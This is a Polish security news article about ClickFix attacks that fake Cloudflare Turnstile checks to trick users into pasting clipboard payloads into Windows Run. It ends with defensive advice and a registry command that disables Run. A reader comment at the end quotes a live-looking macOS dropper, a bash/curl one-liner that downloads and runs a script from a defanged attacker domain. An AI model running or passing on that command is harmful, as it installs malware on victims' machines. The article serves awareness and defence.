Konferencja Mega Sekurak Hacking Party w Krakowie – 26-27 października!

Adminie… Czy znamy Twoje grzechy? ;-) Sprawdź!

Kolejna odsłona ClickFix – tym razem podszywa się pod Cloudflare

04 marca 2026, 06:47 | Aktualności, Teksty | 1 komentarz

Treść:

ClickFix to atak socjotechniczny, który nakłania użytkowników do uruchamiania złośliwych poleceń na ich własnych urządzeniach. Kilka dni temu atakowano w ten sposób użytkowników strony psychologiadziecka[.]org, jednak o pierwszych tego typu atakach ostrzegaliśmy już w 2024 roku.

TLDR:

  • ClickFix to atak socjotechniczny, w którym użytkownik sam uruchamia złośliwe polecenie, myśląc, że wykonuje “niegroźną” czynność (w tym przypadku – przechodzi weryfikację podobną do CAPTCHA).
  • Fałszywa strona zapisuje złośliwy payload w schowku ofiary przy użyciu JavaScript clipboard API.
  • Użytkownik proszony jest o uruchomienie okna Windows Run (Win+R) i wklejenie komendy.
  • Atakujący podszywają się m.in. pod interfejs Cloudflare Turnstile, wykorzystując zaufanie do znanej usługi.
  • Kluczowa jest świadomość użytkowników – nie należy wklejać żadnych poleceń w Windows Run, wierszu poleceń ani w konsoli przeglądarki, jeśli strona o to prosi.

Większość kampanii działa według podobnego schematu – użytkownikowi wyświetlany jest fałszywy (ale całkiem wiarygodnie wyglądający) interfejs, taki jak weryfikacja CAPTCHA czy aktualizacja systemu, wraz z prośbą o wykonanie kilku “prostych kroków” w celu uzyskania dostępu / zainstalowania aktualizacji itp.

Rys. 1 – fałszywa CAPTCHA, źródło: huntress.com

Większość ataków wykorzystuje fakt, że dowolna strona internetowa ma możliwość (z poziomu kodu JavaScript) umieszczania treści w schowku na urządzeniu użytkownika. W taki sposób przekazywany jest sam złośliwy payload, a użytkownik nie kopiuje go sam – nie widzi nawet “jawnie” jego treści.

Następnie strona instruuje użytkownika, by uruchomił okno uruchamiania Windows (skrót Win+R). To istotny element, ponieważ choć umożliwia ono uruchamianie programów i komend, wygląda zupełnie “niewinnie” w porównaniu do systemowego wiersza poleceń.

Rys. 2,3 – Od góry: wiersz poleceń i okno Windows Run

Pierwsze okno u części użytkowników mogłoby wzbudzić podejrzenia. Natomiast drugie nie sugeruje nawet, że zostanie wykonane jakieś polecenie (a w praktyce – dla takiego ataku kliknięcie “OK” w oknie Run daje taki sam efekt jak wciśnięcie “Enter” w wierszu poleceń).

Całkiem sprytnym zagraniem było wykorzystanie do ataków stron imitujących interfejs Cloudflare. Z usług firmy korzystają bowiem ponad 24 miliony stron, a awaria z listopada ubiegłego roku wyłączyła wiele popularnych serwisów i aplikacji. Pomijając wady i zalety takiej “centralizacji”, faktem jest, że użytkownicy kojarzą interfejs Turnstile (stworzona przez Cloudflare alternatywa dla CAPTCHA) z wielu stron.

Atakujący stworzyli więc niemal identyczną względem oryginalnej stronę “weryfikacji”. Znajduje się na niej logo Cloudflare i dynamicznie generowany token udający identyfikator żądania (Cloudflare Ray ID).

Rys. 4 – fałszywa strona Cloudflare, źródło: varonis.com

Gdy użytkownik zaznaczy pole “Verify you are human” na takiej stronie, otrzymuje dodatkowe instrukcje (“Verification steps”). Wyskakujące okno lub komunikat na stronie poprowadzi użytkownika przez kombinacje klawiszy.

Rys. 5 – dodatkowe instrukcje na fałszywej stronie, źródło: varonis.com

Strona, jak wspomnieliśmy wcześniej, skorzystała z JavaScript clipboard API zapisując w schowku złośliwą komendę (payload). Pozostaje więc jedynie przekonać użytkownika by wkleił ją w oknie Windows Run i zatwierdził “Enterem”. Jak pokazaliśmy na zrzutach ekranu, wcale nie musi to wyglądać jak niebezpieczna / wrażliwa czynność, zwłaszcza że uruchomienie takiego polecenia jest względnie proste nawet dla osoby mniej technicznej.

Badacze bezpieczeństwa z Varonis ustalili, że taka strona była de facto pojedynczym plikiem HTML zawierającym także obrazki, style i skrypty, co pozwala łatwo wyświetlić fałszywą stronę w dowolnej domenie kontrolowanej przez atakującego. Kod HTML jest często zaciemniony, aby utrudnić analizę zawartości. Nazwa domeny, na której działa strona oraz token (udający Cloudflare Ray ID) są dynamicznie umieszczane w treści i wyglądają wiarygodnie.

Choć skopiowanie polecenia ma miejsce “w tle”, użytkownik po wklejeniu go w oknie uruchamiania zobaczy oczywiście treść payloadu. Atakujący dostarczają więc na tym etapie tylko jednolinijkowy “dropper” – polecenie, które pobiera kolejny etap malware.

Okno uruchamiania nie działa jak typowy “terminal”, ale można w nim… uruchomić terminal. A dokładniej wykonać polecenie w ramach PowerShell lub MSHTA. Ta druga opcja może sprawić, że polecenie będzie krótsze, a zatem – mniejsza szansa, że wzbudzi podejrzenia.

Rys. 6 – złośliwe polecenie (PowerShell), źródło: varonis.com
Rys. 7 – Windows Run ze złośliwym poleceniem (MSHTA), źródło: huntress.com

“Przewagą” tej techniki jest fakt, że użytkownik bezpośrednio uruchamia polecenie, a nie plik binarny. Dzięki temu część programów antywirusowych, które analizują pliki wykonywalne, może nie wykryć ataku na tym etapie. Złośliwe polecenie może pobrać właściwe malware (np. złośliwą bibliotekę DLL czy plik exe) z serwera atakującego i wykonać je na urządzeniu użytkownika.

Dla payloadów uruchamianych w PowerShell znane są przypadki wyświetlania użytkownikowi dalszych komunikatów, które mają udawać wykonywanie “weryfikacji”:

Rys. 8 – komunikaty w PowerShell, źródło: threatlocker.com

Windows nie jest jednak jedynym atakowanym systemem operacyjnym. Badacze z Push Security analizowali kampanię wymierzoną w użytkowników macOS. W tym przypadku atakujący przygotowali nawet film instruktażowy dla ofiar.

Rys. 9 – fałszywa weryfikacja dla macOS, źródło: pushsecurity.com

Kampanie wykorzystujące ClickFix dostarczały w ten sposób różnorodne payloady – od malware wykradającego informacje (np. Lumma i Stealc), po trojany RAT (Remote Access Trojan), które pozwalają atakującym przejąć kontrolę nad systemem ofiary. Strony, na których wyświetlano fałszywe komunikaty, wykorzystywały nie tylko domeny z literówkami – kilka dni temu zaobserwowaliśmy jeszcze “ciekawszy” sposób.

Strona (nie)chroniona przez Cloudflare

Wydawnictwo Psychologiadziecka[.]org opublikowało ostrzeżenie o ataku na swojej stronie.

Rys. 10 – komunikat wydawnictwa, źródło: facebook.com

Użytkownikom miała wyświetlać się… fałszywa weryfikacja w ramach Cloudflare. Co ciekawe – w polskiej wersji językowej.

Rys. 11 – fałszywa weryfikacja na stronie wydawnictwa, źródło: facebook.com

A dlaczego fałszywa? Otóż strona ta nigdy nie korzystała z usług Cloudflare. Historia rekordów DNS dla domeny psychologiadziecka[.]org pokazuje, że zarówno serwer WWW, jak i DNS są obsługiwane przez hosting cyber_Folks (sam dostawca hostingu nie zmienia wiele w kontekście ataku, kluczowy jest fakt że rekordy nie kierują do serwerów Cloudflare).

Rys. 12 – historia rekordów DNS, źródło: dnshistory.org

Strona wydawnictwa działa na systemie WordPress, więc to jego (lub zainstalowane w nim wtyczki) podejrzewamy jako wektor ataku. Choć w ramach hostingu cyber_Folks wykorzystywany jest WAF (Web Application Firewall) Modsecurity – zabezpieczający przed typowymi podatnościami, atakującemu udało się umieścić własną zawartość na stronie.

Mimo wielu różnych wariantów sam atak polega jednak na prostym mechanizmie – użytkownik w zasadzie samodzielnie otwiera okno i wkleja złośliwe polecenie. W tym miejscu przypomnimy także metodę “na aktualizację Windows”, o której ostrzegaliśmy pod koniec 2025 roku:

Rys. 13 – fałszywa aktualizacja Windows, źródło: huntress.com

Aby zapobiec tego typu atakom, kluczowa jest świadomość użytkowników i szkolenia. Nie należy wklejać jakichkolwiek treści w oknie uruchamiania, wierszu poleceń, pasku Eksploratora plików ani w konsoli przeglądarki, jeśli zostajemy o to poproszeni. W organizacjach warto dodatkowo rozważyć całkowite zablokowanie Windows Run – zazwyczaj nie jest to niezbędne użytkownikom narzędzie, a umożliwia ono pobranie i uruchomienie złośliwego oprogramowania w pozornie “niewinny” sposób.

Na pojedynczym urządzeniu można zablokować okno Windows Run poleceniem:

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f

Listing 1 – polecenie blokujące okno Run

Jest to możliwe również w interfejsie graficznym (Registry editor / Redaktor rejestru) – należy w HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer utworzyć parametr NoRun o wartości 1.

Dla GPO opcja ta jest dostępna w zakładce User Configuration → Administrative Templates → Start Menu and Taskbar → Remove Run Menu from Start Menu.

Źródła:

~Tymoteusz Jóźwiak

Spodobał Ci się wpis? Podziel się nim ze znajomymi:



Komentarze

  1. Kris

    Jest też wersja na mac-a. Ponizszy kod idzie do schowka (razem z instrukcja jak wywołać Terminal.app :-)

    /bin/bash -c “$(curl -A ‘Mac OS X 10_15_7’ -fsSL ‘h22elc6a[.]earedteach[.]digital/?=check&&actmn=mbQjXbPMQDOtwjVV’)”; echo “”BotGuard: Answer the protector challenge. Ref: 31533

    Do pozyskania na speedwaynews[.]pl

    Odpowiedz

Odpowiedz